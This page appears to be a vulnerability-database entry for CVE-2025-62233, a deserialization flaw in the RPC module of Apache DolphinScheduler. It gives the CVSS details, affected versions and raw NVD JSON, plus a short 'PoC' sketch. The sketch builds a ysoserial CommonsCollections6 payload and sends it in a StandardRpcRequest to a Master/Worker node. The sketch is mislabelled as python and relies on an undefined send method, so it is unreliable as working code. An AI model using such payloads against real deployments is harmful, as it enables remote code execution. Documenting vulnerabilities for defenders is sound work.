Security Vulnerability Report
中文
CVE-2025-62233 CVSS 6.3 MEDIUM

CVE-2025-62233

Published: 2026-04-24 11:16:22
Last Modified: 2026-04-27 13:45:45

Description

Deserialization of Untrusted Data vulnerability in Apache DolphinScheduler RPC module. This issue affects Apache DolphinScheduler:  Version >= 3.2.0 and < 3.3.1. Attackers who can access the Master or Worker nodes can compromise the system by creating a StandardRpcRequest, injecting a malicious class type into it, and sending RPC requests to the DolphinScheduler Master/Worker nodes. Users are recommended to upgrade to version [3.3.1], which fixes the issue.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:* - VULNERABLE
Apache DolphinScheduler >= 3.2.0, < 3.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC Concept for CVE-2025-62233 * This demonstrates how to craft a malicious RPC request. */ import org.apache.dolphinscheduler.rpc.StandardRpcRequest; import ysoserial.payloads.ObjectPayload; public class Exploit { public static void main(String[] args) throws Exception { // 1. Generate malicious payload (e.g., using CommonsCollections) String command = "touch /tmp/pwned"; ObjectPayload payload = new CommonsCollections6(); Object maliciousObject = payload.getObject(command); // 2. Construct the malicious StandardRpcRequest StandardRpcRequest request = new StandardRpcRequest(); request.setClassName(maliciousObject.getClass().getName()); request.setArgs(new Object[]{maliciousObject}); // 3. Send request to target Master/Worker via RPC port sendRpcRequest("target-master-ip:port", request); } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62233", "sourceIdentifier": "[email protected]", "published": "2026-04-24T11:16:21.780", "lastModified": "2026-04-27T13:45:44.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in Apache DolphinScheduler RPC module.\n\nThis issue affects Apache DolphinScheduler: \n\nVersion >= 3.2.0 and < 3.3.1.\n\nAttackers who can access the Master or Worker nodes can compromise the system by creating a StandardRpcRequest, injecting a malicious class type into it, and sending RPC requests to the DolphinScheduler Master/Worker nodes.\nUsers are recommended to upgrade to version [3.3.1], which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.3.1", "matchCriteriaId": "18CB4917-60E1-4DE1-AEEE-C035E1CC4F43"}]}]}], "references": [{"url": "https://lists.apache.org/thread/79s80h51r4z5d4l2xs5xy364rmmo1bw0", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/24/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}